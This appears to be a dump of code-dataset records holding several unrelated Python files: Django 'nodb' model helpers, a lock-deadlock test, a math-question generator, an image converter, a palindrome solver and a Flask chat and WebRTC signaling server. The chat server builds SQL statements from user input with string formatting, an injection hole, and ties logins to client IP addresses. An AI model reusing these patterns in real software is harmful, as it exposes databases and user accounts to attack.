\"get() returned more than one %s -- it returned %s!\" % (\n self.model._meta.object_name,\n num\n )\n )\n\n def exists(self):\n return bool(self._filtered_data)\n\n @property\n def query(self):\n return self._query\n\n def filter(self, *args, **kwargs):\n return super(NodbQuerySet, self).filter(*args, **kwargs)\n\n def all(self):\n return super(NodbQuerySet, self).all()\n\n def __str__(self):\n return super(NodbQuerySet, self).__str__()\n\n def __repr__(self):\n return super(NodbQuerySet, self).__repr__()\n\n def __nonzero__(self):\n return bool(len(self))\n\n def iterator(self):\n logger.warning(\n '{}.iterator should only be access when running tests.'.format(self.__class__))\n return []\n\n _db = not None # Make Django 1.8 happy.\n\n\nif django.VERSION[:2] == (1, 6):\n from django.db.models.manager import Manager\n base_manager_class = Manager\n\nelif django.VERSION[:2] == (1, 7):\n from django.db.models.manager import BaseManager\n base_manager_class = BaseManager.from_queryset(NodbQuerySet)\n\nelif django.VERSION[:2] >= (1, 8):\n from django.db.models.manager import BaseManager, Manager\n\n class base_manager_class(BaseManager.from_queryset(NodbQuerySet), Manager):\n \"\"\"in DRF 3, rest_framework.relations.RelatedField#get_queryset checks:\n\n >>> isinstance(queryset, Manager)\n\n This is unfortunate, but we have to inherent from `Manager`, too!\n \"\"\"\n pass\n\n\nclass NodbManager(base_manager_class):\n\n use_for_related_fields = True\n nodb_context = None\n\n @classmethod\n def set_nodb_context(cls, context):\n cls.nodb_context = context\n\n def get_queryset(self):\n if django.VERSION[:2] == (1, 6):\n return NodbQuerySet(self.model, using=self._db, context=NodbManager.nodb_context)\n else:\n return self._queryset_class(self.model, using=self._db, hints=self._hints,\n context=NodbManager.nodb_context)\n\n\nclass LazyProperty(object):\n \"\"\"\n See also: django.db.models.query_utils.DeferredAttribute\n\n Internally used by @bulk_attribute_setter().\n \"\"\"\n class QuerySetPointer(object):\n def __init__(self, target):\n self.target = target\n\n def __init__(self, field_name, eval_func, catch_exceptions, field_names):\n self.field_name = field_name\n self.eval_func = eval_func\n self.catch_exceptions = catch_exceptions\n self.field_names = field_names\n\n def __get__(self, instance, owner=None):\n \"\"\"\n runs eval_func which fills some lazy properties.\n \"\"\"\n if hasattr(instance, '_query_set_pointer'):\n query_set = instance._query_set_pointer.target\n else:\n # Fallback. 
Needed for objects without a queryset.\n query_set = [instance]\n if self.field_name in instance.__dict__:\n return instance.__dict__[self.field_name]\n\n if self.catch_exceptions is None:\n self.eval_func(instance, query_set, self.field_names)\n else:\n try:\n self.eval_func(instance, query_set, self.field_names)\n except self.catch_exceptions as e:\n logger.exception('failed to populate Field \"{}\" of {} ({})'\n .format(self.field_name, unicode(instance), instance.__class__))\n fields = instance.__class__.make_model_args({}, fields_force_none=self.field_names)\n for field_name, value in fields.items():\n setattr(instance, field_name, value)\n\n if self.field_name not in instance.__dict__:\n raise KeyError(\n 'LazyProperty: {} did not set {} of {}'.format(self.eval_func, self.field_name,\n instance))\n return instance.__dict__[self.field_name]\n\n def __set__(self, instance, value):\n \"\"\"\n Deferred loading attributes can be set normally (which means there will\n never be a database lookup involved.\n \"\"\"\n instance.__dict__[self.field_name] = value\n\n\ndef bulk_attribute_setter(field_names, catch_exceptions=None):\n \"\"\"\n The idea @behind bulk_attribute_setter is to delay expensive calls to librados, until someone\n really needs the information gathered in this call. If the attribute is never used, the call\n will never be executed. In general, this is called lazy execution.\n\n Before, NodbQuerySet called self.model.get_all_objects to generate a list of objects. The\n implementations of get_all_objects were calling the librados commands to fill all attributes,\n even if they were never accessed.\n\n Because a field may never be accessed, this can generate better performance than caching,\n especially if the cache is cold.\n\n The bulk_attribute_setter decorator can be used like so:\n >>> class MyModel(NodbModel):\n >>> my_field = models.IntegerField()\n >>>\n >>> @bulk_attribute_setter(['my_field'])\n >>> def set_my_field(self, objs, field_names):\n >>> self.my_field = 42\n\n Keep in mind, that you can set the my_field attribute on all objects, not just self.\n\n The decorator modifies the model to look like this:\n >>> def set_my_field(self, objs):\n >>> self.my_field = 42\n >>>\n >>> class MyModel(NodbModel):\n >>> my_field = models.IntegerField()\n >>> set_my_field = LazyPropertyContributor(['my_field'], set_my_field)\n\n A LazyPropertyContributor property implements the contribute_to_class method, which modifies\n the model itself to look like so:\n >>> class MyModel(NodbModel):\n >>> my_field = LazyProperty('my_field', set_my_field)\n\n The my_field field is not overwritten, because the fields are already moved into the _meta class\n at this point. If someone then accesses the my_field attribute, LazyProperty.__get__ is called,\n which then calls set_my_field to set the field, as if one had written:\n >>> instances = MyModel.objects.all()\n >>> set_my_field(instances[0], instances)\n >>> assert instances[0].my_field == 42\n\n For example, get_all_objects generates a QuerySet like this:\n\n id\tname\t disk_usage\n 0\t'foo' LazyProperty('disk_usage')\n 1\t'bar'\t LazyProperty('disk_usage')\n\n When accessing bar.disk_usage, LazyProperty calls `ceph df` and fills the queryset like so:\n\n id\tname\tdisk_usage\n 0\t'foo' 1MB\n 1\t'bar' \t2MB\n\n :type field_names: list[str]\n :param catch_exceptions: Exceptions that will be caught. 
In case of an exception, all\n `field_names` will be set to None.\n :type catch_exceptions: exceptions.Exception | tuple[exceptions.Exception]\n \"\"\"\n\n if not len(field_names):\n raise ValueError('`field_names` must not be empty.')\n\n class LazyPropertyContributor(object):\n def __init__(self, field_names, func):\n self.field_names = field_names\n self.func = func\n\n def contribute_to_class(self, cls, name, virtual_only=False):\n for name in self.field_names:\n setattr(cls, name, LazyProperty(name, self.func, catch_exceptions,\n self.field_names))\n\n def decorator(func):\n return LazyPropertyContributor(field_names, func)\n\n return decorator\n\n\nclass NodbModel(models.Model):\n\n objects = NodbManager()\n\n class Meta:\n # Needs to be true to be able to create the necessary database tables by using Django\n # migrations. The table is necessary to be able to use Django model relations.\n managed = True\n abstract = True\n\n @staticmethod\n def get_all_objects(context, query):\n msg = 'Every NodbModel must implement its own get_all_objects() method.'\n raise NotImplementedError(msg)\n\n def get_modified_fields(self, update_fields=None, **kwargs):\n \"\"\"\n Returns a dict of fields, which have changed. There are two known problems:\n\n 1. There is a race between get_modified_fields and the call to this.save()\n 2. A type change, e.g. str and unicode is not handled.\n\n :param update_fields: restrict the search for updated fields to update_fields.\n :param kwargs: used to retrieve the original. default: `pk`\n :rtype: tuple[dict[str, Any], T <= NodbModel]\n :return: A tuple consisting of the diff and the original model instance\n \"\"\"\n if not kwargs:\n kwargs['pk'] = self.pk\n\n field_names = [f.attname for f in self.__class__._meta.fields]\n if update_fields is None:\n update_fields = field_names\n else:\n assert not (set(update_fields) - set(field_names))\n\n fields = [f for f in self.__class__._meta.fields if f.attname in update_fields]\n original = self.__class__.objects.get(**kwargs)\n return {\n field.attname: getattr(self, field.attname, None)\n for field\n in fields\n if field.editable and getattr(self, field.attname, None) != getattr(original,\n field.attname, None)\n }, original\n\n def attribute_is_unevaluated_lazy_property(self, attr):\n \"\"\"\n :rtype: bool\n \"\"\"\n if attr not in self.__class__.__dict__:\n return False\n prop = self.__class__.__dict__[attr]\n if not isinstance(prop, LazyProperty):\n return False\n return attr not in self.__dict__\n\n def set_read_only_fields(self, obj, include_pk=True):\n \"\"\"\n .. 
example::\n >>> insert = self.id is None\n >>> diff, original = self.get_modified_fields(name=self.name) if insert\n >>> else self.get_modified_fields()\n >>> if not insert:\n >>> self.set_read_only_fields()\n \"\"\"\n if include_pk:\n self.pk = obj.pk\n\n for field in self.__class__._meta.fields:\n if (not field.editable\n and not self.attribute_is_unevaluated_lazy_property(field.attname)\n and hasattr(obj, field.attname)\n and getattr(self, field.attname, None) != getattr(obj, field.attname)):\n setattr(self, field.attname, getattr(obj, field.attname))\n\n @classmethod\n def make_model_args(cls, json_result, fields_force_none=None):\n \"\"\"\n TODO: fields_force_none could be auto generated by the field names.\n\n :type json_result: dict[str, Any]\n :type fields_force_none: list[str]\n :rtype: dict[str, Any]\n \"\"\"\n def get_val_from_json(key):\n if key in json_result:\n return json_result[key]\n elif key.replace('_', '-') in json_result:\n # '-' is not supported for field names, but used by ceph.\n return json_result[key.replace('_', '-')]\n raise AttributeError\n\n def handle_field(field):\n \"\"\":rtype: list[tuple[str, Any]]\"\"\"\n try:\n val = get_val_from_json(field.attname)\n except AttributeError:\n return []\n\n if val is None and not field.null:\n return []\n\n if isinstance(field, models.ForeignKey):\n return [(field.attname, val)]\n\n try:\n python_val = field.to_python(val)\n except ValidationError as e:\n return []\n\n return [(field.attname, python_val)]\n\n model_args = dict(\n itertools.chain.from_iterable([handle_field(field) for field in cls._meta.fields])\n )\n for name in fields_force_none or []:\n if name not in model_args:\n model_args[name] = None\n return model_args\n\n def __init__(self, *args, **kwargs):\n # super(NodbModel, self).__init__(*args, **kwargs)\n self._state = ModelState()\n\n self.__dict__.update(kwargs)\n\n # We need to trigger the __set__ method of related fields\n for (key, value) in kwargs.iteritems():\n if key in self.__class__.__dict__ and \\\n isinstance(self.__class__.__dict__[key], ReverseSingleRelatedObjectDescriptor):\n setattr(self, key, value)\n\n for field in self._meta.concrete_fields:\n is_related_field = isinstance(field.rel, ForeignObjectRel)\n\n # set defaults:\n if not is_related_field \\\n and not self.attribute_is_unevaluated_lazy_property(field.name) \\\n and not hasattr(self, field.name):\n setattr(self, field.name, field.get_default())\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n \"\"\"\n This base implementation does nothing, except telling django that self is now successfully\n inserted.\n \"\"\"\n self._state.adding = False\n\n\nclass JsonField(Field):\n empty_strings_allowed = False\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n :param base_type: list | dict\n :type base_type: type\n :rtype: JsonField[T]\n \"\"\"\n self.base_type = kwargs['base_type']\n del kwargs['base_type']\n super(JsonField, self).__init__(*args, **kwargs)\n\n def to_python(self, value):\n \"\"\":rtype: T\"\"\"\n def check_base_type(val):\n if not isinstance(val, self.base_type):\n raise exceptions.ValidationError(\n \"invalid JSON type. 
Got {}, expected {}\".format(type(val), self.base_type),\n code='invalid',\n params={'value': value},\n )\n return val\n\n if value is None:\n return None\n if isinstance(value, self.base_type):\n return value\n if not value and self.null:\n return None\n try:\n parsed = json.loads(value)\n return check_base_type(parsed)\n except (ValueError, TypeError) as _:\n try:\n # Evil hack to support PUT requests to the Browsable API of the\n # django-rest-framework as we cannot determine if restapi.JsonField.tonative() is\n # called for json or for rendering the form.\n obj = ast.literal_eval(value)\n return check_base_type(obj)\n except ValueError:\n raise exceptions.ValidationError(\n \"invalid JSON\",\n code='invalid',\n params={'value': value},\n )\n\n def deconstruct(self):\n name, path, args, kwargs = super(JsonField, self).deconstruct()\n kwargs['base_type'] = self.base_type\n return name, path, args, kwargs\n\n @property\n def empty_values(self):\n return [u'', [], {}]\n\ntry:\n from django.db.migrations import AlterField\n\n class AlterNoDBField(AlterField):\n def database_forwards(self, app_label, schema_editor, from_state, to_state):\n pass\n\n def describe(self):\n return \"Alter NoDB field {} on {}\".format(self.name, self.model_name)\nexcept ImportError:\n # Django 1.6 does not have an AlterField, but it also doesn't use the Django 1.7+ migrations, so\n # no need to do anything here.\n pass\n","repo_name":"openattic/openattic","sub_path":"backend/nodb/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":22356,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"48"}
+{"seq_id":"21639496341","text":"import checker\nfrom MCLock import Semaphore\nfrom MCThread import MCThread\n\n# class Mutex:\n#single writer assumed\n \n# Rcount = 0 \n# Wmutex = Semaphore(\"WM\",1) \n# Rmutex = Semaphore(\"RM\", 1) \n# File = Semaphore(\"FILE\", 1) \n# Wirte = Semaphore(\"Write\",1)\n\n# @MCThread\n# def t1(self):\n# self.Wirte.P()\n# self.Rmutex.P()\n# if self.Rcount == 0:\n# self.File.P()\n# self.Rcount += 1\n# self.Rmutex.V()\n# self.Wirte.V()\n# self.Rmutex.P()\n# self.Rcount -= 1\n# if self.Rcount == 0:\n# self.File.V()\n# self.Rmutex.V()\n\n# @MCThread\n# def t2(self):\n# self.Wmutex.P()\n# self.Wirte.P()\n# self.Wmutex.V()\n# self.File.P()\n# self.File.V()\n# self.Wmutex.P()\n# self.Wirte.V()\n# self.Wmutex.V()\n\n\nclass Mutex:\n lock1 = Semaphore(\"lk1\", 1)\n lock2 = Semaphore(\"lk2\", 1)\n\n @MCThread\n def t1(self):\n while True:\n self.lock1.P()\n self.lock2.P()\n self.lock2.V()\n self.lock1.V()\n\n @MCThread\n def t2(self):\n while True:\n self.lock2.P()\n self.lock1.P()\n self.lock1.V()\n self.lock2.V()\n\nchecker.check()","repo_name":"Usernamehaha2018/design","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
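The Mutex class in the record above is the textbook lock-ordering deadlock that the checker is meant to catch: t1 acquires lk1 then lk2 while t2 acquires lk2 then lk1, so there is an interleaving where each thread holds the lock the other one needs. A short sketch of the usual fix with standard threading primitives rather than the MCLock API: always acquire locks in one global order.

import threading

lock_a = threading.Lock()
lock_b = threading.Lock()


def acquire_in_order(*locks):
    # Sort by id() so every thread agrees on one global acquisition order;
    # a cycle of "holds one, waits for the other" can then never form.
    return sorted(locks, key=id)


def worker():
    first, second = acquire_in_order(lock_a, lock_b)
    with first:
        with second:
            pass  # critical section


threads = [threading.Thread(target=worker) for _ in range(2)]
for t in threads:
    t.start()
for t in threads:
    t.join()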
+{"seq_id":"5005666082","text":"import random\nimport operator\n\n# What is the third biggest value in -0.25, 403, -1?\n# Which is the biggest value? (a) -2/79 (b) 1 (c) 6/17\n\nqns = open('./questions.txt', 'w')\nans = open('./answers.txt','w')\nno_of_samples = 1000000\narr = ['biggest', 'smallest']\nqn_arr = ['','','second','third','fourth','fifth']\nabcde = ['(a)','(b)','(c)','(d)','(e)']\n\ndef num_gen():\n types = random.randint(1,20)\n if types<=8:\n return random.randint(-100, 100),0\n elif types<=14:\n num = random.randint(-100,100)\n return round(num/100,2),0\n else:\n num = random.randint(-10,10)\n den = random.randint(1,20)\n return num, den\n\nfor j in range(no_of_samples):\n no_of_nums = random.randint(3,5)\n qn_word = random.randint(1,no_of_nums)\n big_small = random.randint(0,1)\n \n nums = []\n a_arr = []\n b_arr = []\n temp = [] \n count = 0 \n while count < no_of_nums:\n a, b = num_gen()\n a_arr.append(a)\n b_arr.append(b)\n if b==0:\n if a in temp:\n continue\n else:\n temp.append(a)\n count+=1\n else:\n if round(a/b,2) in temp:\n continue\n else:\n temp.append(round(a/b,2))\n count+=1\n\n types = random.randint(1,6)\n if types!=6:\n if qn_word!=1:\n q = \"Which is the \"+qn_arr[qn_word]+\" \"+arr[big_small]+\" value? \"\n else:\n q = \"Which is the \"+arr[big_small]+\" value? \" \n for i in range(no_of_nums):\n q = q + abcde[i] + \" \"\n if b_arr[i]==0:\n q = q + str(a_arr[i])\n else:\n q = q + str(a_arr[i])+\"/\"+str(b_arr[i])\n if i!=no_of_nums-1:\n q = q + \" \"\n q = q + \"\\n\"\n else:\n if qn_word!=1:\n q = \"What is the \"+qn_arr[qn_word]+\" \"+arr[big_small]+\" value in \"\n else:\n q = \"What is the \"+arr[big_small]+\" value in \"\n for i in range(no_of_nums):\n if b_arr[i]==0:\n q = q + str(a_arr[i])\n else:\n q = q + str(a_arr[i])+\"/\"+str(b_arr[i])\n if i!=no_of_nums-1:\n q = q + \", \"\n else:\n q = q + \"?\"\n q = q + \"\\n\"\n\n an = \"\"\n enumerate_object = enumerate(temp)\n if big_small==0:\n sorted_pairs = sorted(enumerate_object, key=operator.itemgetter(1), reverse=True) \n else:\n sorted_pairs = sorted(enumerate_object, key=operator.itemgetter(1))\n sorted_indices = []\n sorted_ele = []\n for index, element in sorted_pairs:\n sorted_indices.append(index)\n sorted_ele.append(element)\n if types == 6:\n if b_arr[sorted_indices[qn_word-1]]==0:\n an = str(a_arr[sorted_indices[qn_word-1]])\n else:\n an = str(a_arr[sorted_indices[qn_word-1]])+\"/\"+str(b_arr[sorted_indices[qn_word-1]])\n else:\n an = abcde[sorted_indices[qn_word-1]]\n qns.write(q)\n ans.write(an+\"\\n\")\nqns.close()\nans.close()","repo_name":"misterpawan/scimat2","sub_path":"mathematics/NumberTheory/kthbiggest/kthbiggest.py","file_name":"kthbiggest.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"}
+{"seq_id":"38693235625","text":"import PIL.Image\n# Adding the GUI interface\n#from tkinter import *\nimport os\nimport cv2\n \n\nimg_path = \"\"\n\nsave_folder = \"G:\\\\Nishat_DLC\\\\MPII-human-nishat-2023-02-09\\\\labeled-data\\\\MPIIpng\\\\\"\n\n# To convert the image From JPG to PNG\nfor dir in os.listdir(img_path):\n if dir == '.DS_Store':\n continue\n else:\n currentpath = img_path + dir + \"/\"\n altpath = dir + \"/\"\n for filename in os.listdir(currentpath):\n if filename == '.DS_Store':\n continue\n else:\n img = cv2.imread(currentpath + filename, cv2.IMREAD_UNCHANGED)\n cv2.imwrite(save_folder + altpath + os.path.splitext(filename)[0] + \".png\", img)\n\t ","repo_name":"nishata24/Training-Image-PreProcessing","sub_path":"HELLO/jpg_to_png.py","file_name":"jpg_to_png.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
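For reference, the directory walk above can be written more defensively with pathlib; this keeps the cv2 dependency, skips unreadable files, and derives the output name without stacking extensions. The paths here are placeholders, not the ones from the record:

import cv2
from pathlib import Path

src = Path("input_frames")   # placeholder source root
dst = Path("output_png")     # placeholder destination root

for jpg in src.rglob("*.jpg"):
    img = cv2.imread(str(jpg), cv2.IMREAD_UNCHANGED)
    if img is None:  # unreadable or corrupt file: skip instead of writing junk
        continue
    out = dst / jpg.relative_to(src).with_suffix(".png")
    out.parent.mkdir(parents=True, exist_ok=True)
    cv2.imwrite(str(out), img)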
","repo_name":"nishata24/Training-Image-PreProcessing","sub_path":"HELLO/jpg_to_png.py","file_name":"jpg_to_png.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15345972422","text":"class Solution:\n def partition(self, s: str) -> List[List[str]]:\n ans = []\n temp = []\n\n def dfs(i):\n if i >= len(s):\n ans.append(temp.copy())\n return\n\n for n in range(i, len(s)):\n if self.isPalindrome(s, i, n):\n temp.append(s[i: n + 1])\n dfs(n + 1)\n temp.pop()\n dfs(0)\n return ans\n def isPalindrome(self, s, i , n):\n a = s[i : n + 1]\n return a == a[::-1]","repo_name":"GARlMAN/leetcode","sub_path":"0131-palindrome-partitioning/0131-palindrome-partitioning.py","file_name":"0131-palindrome-partitioning.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11924383883","text":"from concurrent.futures import thread\r\nfrom pickle import TRUE\r\nfrom urllib import request\r\nimport flask\r\nfrom flask_socketio import SocketIO, emit, join_room\r\nimport DBconntctor\r\nimport functions\r\nimport os\r\nimport ssl\r\nfrom waitress import serve # Waitressをインポート\r\n\r\n#テキストチャットの通知に使うルーム(キーがユーザーネームで値がルーム番号)\r\nrooms = dict()\r\n#現在のルーム番号の最大値が格納される\r\nroom_no = 0\r\n#グループのテキストチャット用\r\nrooms_group = dict()\r\nroom_no_group = 1000\r\n#RTC用\r\nrooms_for_rtc = dict()\r\nroom_no_rtc = 2000\r\napp = flask.Flask(__name__)\r\nasyncMode = \"threading\"\r\nsocketio = SocketIO(app, cors_allowed_origins=\"*\", async_mode=asyncMode, logger=True, engineio_logger=True)\r\ncontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)\r\ncontext.load_cert_chain('Python/certificate/cert.pem','Python/certificate/privkey.pem')\r\nLogin_users = {\"exampleip\":\"exampleuser\"}\r\n\r\n\r\n###########socketio##############\r\n#section for socketio in text chat\r\n#messages for 1 on 1\r\n@socketio.on('join')\r\ndef handle_join(postTo,postFrom):\r\n print(postTo,postFrom)\r\n global room_no\r\n global rooms\r\n for key in rooms:\r\n if (key == postFrom) or (key == postTo):\r\n print(rooms[key])\r\n join_room(rooms[key])\r\n emit('send_room_no',rooms[key])\r\n return \r\n room_no = room_no + 1\r\n rooms[postFrom] = room_no\r\n rooms[postTo] = room_no\r\n join_room(room_no)\r\n emit('send_room_no',room_no)\r\n\r\n@socketio.on('send')\r\ndef send(postFrom,postTo,content,roomNo):\r\n stmt = 'INSERT INTO messages (postFrom,postTo,content) VALUE (\"{}\",\"{}\",\"{}\")'.format(postFrom,postTo,content)\r\n DBconntctor.Insert_to_DB(stmt)\r\n emit('server response', room=roomNo)\r\n\r\n#messages for groups\r\n@socketio.on('join_room')\r\ndef handle_join_room(group_id):\r\n global room_no_group\r\n global rooms_group\r\n for key in rooms_group:\r\n if key == group_id:\r\n print(rooms_group[key])\r\n join_room(rooms_group[key])\r\n emit('send_room_no',rooms_group[key])\r\n return\r\n room_no_group = room_no_group + 1\r\n rooms_group[group_id] = room_no_group\r\n join_room(rooms_group[group_id])\r\n emit('send_room_no',room_no_group)\r\n\r\n@socketio.on('send_group')\r\ndef sendGroup(sendername,groupid,content,roomNo):\r\n stmt = 'INSERT INTO groups_massages (groupID,content,sendername) VALUE (\"{}\",\"{}\",\"{}\")'.format(groupid,content,sendername)\r\n DBconntctor.Insert_to_DB(stmt)\r\n emit('server response',room=roomNo)\r\n###########socketio end##############\r\n\r\n###########socketio signaling###########\r\n#section for webRTC 
+{"seq_id":"11924383883","text":"from concurrent.futures import thread\r\nfrom pickle import TRUE\r\nfrom urllib import request\r\nimport flask\r\nfrom flask_socketio import SocketIO, emit, join_room\r\nimport DBconntctor\r\nimport functions\r\nimport os\r\nimport ssl\r\nfrom waitress import serve # Import Waitress\r\n\r\n# Rooms used for text chat notifications (key: username, value: room number)\r\nrooms = dict()\r\n# Holds the current maximum room number\r\nroom_no = 0\r\n# For group text chat\r\nrooms_group = dict()\r\nroom_no_group = 1000\r\n# For RTC\r\nrooms_for_rtc = dict()\r\nroom_no_rtc = 2000\r\napp = flask.Flask(__name__)\r\nasyncMode = \"threading\"\r\nsocketio = SocketIO(app, cors_allowed_origins=\"*\", async_mode=asyncMode, logger=True, engineio_logger=True)\r\ncontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)\r\ncontext.load_cert_chain('Python/certificate/cert.pem','Python/certificate/privkey.pem')\r\nLogin_users = {\"exampleip\":\"exampleuser\"}\r\n\r\n\r\n###########socketio##############\r\n#section for socketio in text chat\r\n#messages for 1 on 1\r\n@socketio.on('join')\r\ndef handle_join(postTo,postFrom):\r\n print(postTo,postFrom)\r\n global room_no\r\n global rooms\r\n for key in rooms:\r\n if (key == postFrom) or (key == postTo):\r\n print(rooms[key])\r\n join_room(rooms[key])\r\n emit('send_room_no',rooms[key])\r\n return \r\n room_no = room_no + 1\r\n rooms[postFrom] = room_no\r\n rooms[postTo] = room_no\r\n join_room(room_no)\r\n emit('send_room_no',room_no)\r\n\r\n@socketio.on('send')\r\ndef send(postFrom,postTo,content,roomNo):\r\n stmt = 'INSERT INTO messages (postFrom,postTo,content) VALUE (\"{}\",\"{}\",\"{}\")'.format(postFrom,postTo,content)\r\n DBconntctor.Insert_to_DB(stmt)\r\n emit('server response', room=roomNo)\r\n\r\n#messages for groups\r\n@socketio.on('join_room')\r\ndef handle_join_room(group_id):\r\n global room_no_group\r\n global rooms_group\r\n for key in rooms_group:\r\n if key == group_id:\r\n print(rooms_group[key])\r\n join_room(rooms_group[key])\r\n emit('send_room_no',rooms_group[key])\r\n return\r\n room_no_group = room_no_group + 1\r\n rooms_group[group_id] = room_no_group\r\n join_room(rooms_group[group_id])\r\n emit('send_room_no',room_no_group)\r\n\r\n@socketio.on('send_group')\r\ndef sendGroup(sendername,groupid,content,roomNo):\r\n stmt = 'INSERT INTO groups_massages (groupID,content,sendername) VALUE (\"{}\",\"{}\",\"{}\")'.format(groupid,content,sendername)\r\n DBconntctor.Insert_to_DB(stmt)\r\n emit('server response',room=roomNo)\r\n###########socketio end##############\r\n\r\n###########socketio signaling###########\r\n#section for webRTC signaling\r\n@socketio.on('connect_rtc')\r\ndef handle_rtc_connect(connectFrom,connectTo):\r\n global room_no_rtc\r\n global rooms_for_rtc\r\n if connectFrom not in rooms_for_rtc:\r\n room_no_rtc = room_no_rtc + 1\r\n rooms_for_rtc[connectFrom] = room_no_rtc\r\n if connectTo not in rooms_for_rtc:\r\n room_no_rtc = room_no_rtc + 1\r\n rooms_for_rtc[connectTo] = room_no_rtc\r\n print('connected')\r\n join_room(rooms_for_rtc[connectFrom])\r\n\r\n@socketio.on('offer')\r\ndef handle_offer(data,connectTo):\r\n emit('offer_data', data, room=rooms_for_rtc[connectTo])\r\n\r\n@socketio.on('answer')\r\ndef handle_answer(data,connectTo):\r\n emit('answer_data', data, room=rooms_for_rtc[connectTo])\r\n\r\n@socketio.on('candidate')\r\ndef handle_candidate(data,connectTo):\r\n emit('candidate_data', data, room=rooms_for_rtc[connectTo])\r\n\r\n@socketio.on('share_screen')\r\ndef handle_share_screen(connectTo):\r\n emit('share_screen',room=rooms_for_rtc[connectTo])\r\n###########socketio signaling end####################\r\n\r\n
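The handlers above relay offers, answers and ICE candidates into the per-user rooms registered by connect_rtc. A sketch of a matching client using the python-socketio package; the event names follow the server code, while the URL, user names and SDP payloads are placeholders:

import socketio

sio = socketio.Client()

@sio.on('offer_data')
def on_offer(data):
    # Hand the remote offer to the local RTC engine, then send back an answer.
    answer = {'type': 'answer', 'sdp': '...'}  # produced by the RTC engine
    sio.emit('answer', (answer, 'alice'))      # second element: peer to route to

@sio.on('candidate_data')
def on_candidate(data):
    pass  # add the ICE candidate to the peer connection

sio.connect('https://192.168.0.50')            # placeholder server URL
sio.emit('connect_rtc', ('bob', 'alice'))      # (connectFrom, connectTo)
sio.emit('offer', ({'type': 'offer', 'sdp': '...'}, 'alice'))
sio.wait()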
###########show voice chat page###################\r\n@app.route('/voiceChat',methods=['GET'])\r\ndef videoChat():\r\n\r\n #check if user is logged in\r\n if functions.CheckLogin(flask.request.remote_addr) == False:\r\n return flask.redirect('/')\r\n \r\n #get username and the friend name to connect to\r\n username = functions.GetUserNameFromIp(flask.request.remote_addr)\r\n connectTo = flask.request.args.get('connectTo')\r\n\r\n #check if user and connectTo are friends\r\n if functions.check_friend(username,connectTo) == False:\r\n return flask.redirect('/')\r\n\r\n return flask.render_template('vc_room.html', connectTo = connectTo, connectFrom = username)\r\n\r\n###########show signin page##############\r\n@app.route('/',methods =['GET','POST'])\r\ndef main():\r\n if flask.request.method == \"GET\":\r\n props = {'title': 'Index', 'msg': 'MessagingCenter'}\r\n return flask.render_template('index.html', props=props)\r\n if flask.request.method == 'POST':\r\n # Check the username and password\r\n username = flask.request.form['username']\r\n password = flask.request.form['password']\r\n\r\n # Log out the current user first\r\n userip = flask.request.remote_addr\r\n functions.LogoutFromUser(userip)\r\n # Log in\r\n if functions.CheckSignin(username,password,flask.request.remote_addr) == True:\r\n return flask.redirect('/message/home')\r\n props = {'title': 'Index', 'msg': '入力間違いです'}\r\n return flask.render_template('index.html', props=props)\r\n\r\n\r\n###########show signup page##############\r\n@app.route('/signup', methods=[\"POST\",\"GET\"])\r\ndef signup():\r\n if flask.request.method == \"POST\":\r\n username = flask.request.form['username']\r\n password = flask.request.form['password']\r\n # Hash the password to improve security\r\n password = functions.hash_pass(password)\r\n stmt = 'SELECT EXISTS(SELECT * FROM users WHERE name = %s)'\r\n param = (username,)\r\n # Check whether the username is already registered\r\n if DBconntctor.Select_from_DB(stmt,param)[0][0]==1:\r\n return flask.render_template('signup.html',props = \"Username already exists\")\r\n # Register the user in the database\r\n stmt = 'INSERT INTO users (name,passWord) VALUE (\"{}\",\"{}\")'.format(username,password)\r\n DBconntctor.Insert_to_DB(stmt)\r\n # Register the user info in the database\r\n stmt = 'INSERT INTO user_info (userId) VALUE (\"{}\")'.format(username)\r\n DBconntctor.Insert_to_DB(stmt)\r\n return flask.redirect('/')\r\n if flask.request.method == \"GET\":\r\n return flask.render_template('signup.html',props = \"アカウント登録\")\r\n\r\n\r\n###########log out##############\r\n@app.route('/logout',methods = [\"GET\"])\r\ndef logout():\r\n userip = flask.request.remote_addr\r\n functions.LogoutFromUser(userip)\r\n return flask.redirect('/')\r\n\r\n\r\n
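One caveat for the routes in this file: the INSERT and UPDATE statements are built with str.format on raw form input, which is open to SQL injection, while Select_from_DB already receives the values as a separate tuple. A sketch of the same parameterized style for writes; it assumes the connector can forward params to the driver, and get_connection is a stand-in for however DBconntctor obtains its connection:

# Hypothetical parameterized counterpart to DBconntctor.Insert_to_DB.
def insert_to_db(stmt, param=()):
    conn = get_connection()           # stand-in for the connector's own setup
    try:
        with conn.cursor() as cur:
            cur.execute(stmt, param)  # the driver quotes the values, not str.format
        conn.commit()
    finally:
        conn.close()

# Usage with placeholders instead of .format():
username, post_to, content = 'alice', 'bob', 'hello'
insert_to_db('INSERT INTO messages (postFrom, postTo, content) VALUES (%s, %s, %s)',
             (username, post_to, content))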
